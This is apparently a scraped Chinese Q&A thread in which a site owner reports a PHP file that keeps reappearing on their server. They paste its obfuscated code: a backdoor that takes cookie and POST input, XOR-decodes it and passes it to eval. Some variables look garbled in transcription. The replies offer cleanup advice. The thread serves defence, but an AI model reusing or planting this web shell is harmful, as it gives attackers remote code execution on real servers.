PHP文件注入。。如何解决这个问题?
在我的网站上总是有一个文件被上传,即使我不是上传它的那个人 这是你打开它时的代码。。你知道怎么阻止吗PHP文件注入。。如何解决这个问题?,php,laravel,codeigniter,Php,Laravel,Codeigniter,在我的网站上总是有一个文件被上传,即使我不是上传它的那个人 这是你打开它时的代码。。你知道怎么阻止吗 <?php 1.$ilmtik[4] . $ilmtik[26] . $ilmtik[20] . $ilmtik[18] . $ilmtik[12] . $ilmtik[3] . $ilmtik[22] . $ilmtik1 . $ilmtik[5] . $ilmtik[14] . $ilmtik[28] . $ilmtik[5] . $ilmtik[30] . $ilmtik[30]
<?php
1.$ilmtik[4] . $ilmtik[26] . $ilmtik[20] . $ilmtik[18] . $ilmtik[12] . $ilmtik[3] . $ilmtik[22] . $ilmtik1 . $ilmtik[5] . $ilmtik[14] . $ilmtik[28] . $ilmtik[5] . $ilmtik[30] . $ilmtik[30] . $ilmtik[4] . $ilmtik[26];
$kkunht[] = $ilmtik[24] . $ilmtik[13];
$kkunht[] = $ilmtik[0];
$kkunht[] = $ilmtik[26] . $ilmtik[17] . $ilmtik[27] . $ilmtik[21] . $ilmtik[32];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[23] . $ilmtik[16] . $ilmtik[3] . $ilmtik[2] . $ilmtik[3] . $ilmtik[6] . $ilmtik[32];
$kkunht[] = $ilmtik[3] . $ilmtik[29] . $ilmtik[2] . $ilmtik[8] . $ilmtik[17] . $ilmtik[12] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[27] . $ilmtik[22] . $ilmtik[10] . $ilmtik[32] . $ilmtik[16];
$kkunht[] = $ilmtik[6] . $ilmtik[16] . $ilmtik[16] . $ilmtik[6] . $ilmtik[25] . $ilmtik[23] . $ilmtik[34] . $ilmtik[3] . $ilmtik[16] . $ilmtik[33] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[8] . $ilmtik[3] . $ilmtik[21];
$kkunht[] = $ilmtik[2] . $ilmtik[6] . $ilmtik[26] . $ilmtik[15];
foreach($kkunht[7]($_COOKIE, $_POST) as $dfmafta => $ozyods) {
function lawlvc($kkunht, $dfmafta, $fanykfj)
{
return $kkunht[6]($kkunht[4]($dfmafta . $kkunht[0], ($fanykfj / $kkunht8) + 1) , 0, $fanykfj);
}
function cuoen($kkunht, $soeasy)
{
return @$kkunht[9]($kkunht1, $soeasy);
}
function mktryk($kkunht, $soeasy)
{
$pcrtw = $kkunht3 % 3;
if (!$pcrtw) {
eval($soeasy1);
exit();
}
}
$ozyods = cuoen($kkunht, $ozyods);
mktryk($kkunht, $kkunht[5]($kkunht[2], $ozyods ^ lawlvc($kkunht, $dfmafta, $kkunht8)));
}
有许多扫描仪可以检查您的站点(例如,)
为了解决这个问题,我将禁用php,关闭http访问,然后使用ssh访问站点并开始清理恶意软件。更改密码不是一个坏主意,但不会对后门产生太大影响。在您的网站上更改密码?我已经更改了,但不起作用..:(你试过分析这个文件吗?)Godaddy上有两组密码,主Godaddy密码和网站密码。你确认你更改了网站密码吗?我已经清理了网站,现在仍然如此..就像每天一样..我也更改了密码..我想这是注射..但我不确定..我没有任何想法..您是否尝试过任何扫描仪(如上面提到的,尽管您可以四处查看并找到其他人)以查看他们是否能够检测到原因?我尝试过扫描仪,但不幸的是它找不到导致此问题的恶意软件..扫描未检测到恶意软件(低风险)未检测到注入的垃圾邮件(低风险)未检测到损坏(低风险)我会从头开始重建网站。一次安装一个软件包,使您拥有最新的安全补丁,并且不要安装任何信誉有问题的软件包。您甚至可能希望将其托管到其他地方。您网站的URL是什么?我们已经重建了网站,但仍然没有效果。恶意软件没有虽然不会影响设计和功能,但是当你把它添加到adwords上时谷歌不会允许,因为它有一个恶意软件我每天都在删除这些文件,每天它都会回来我不知道它是哪种恶意软件我不知道它来自哪里但是当我看代码的时候,我可以看到一个会话并在那里发布但是我不知道这意味着什么……可能是会话劫持或cookie,但我不确定如果有人对此有经验,为什么我需要意见。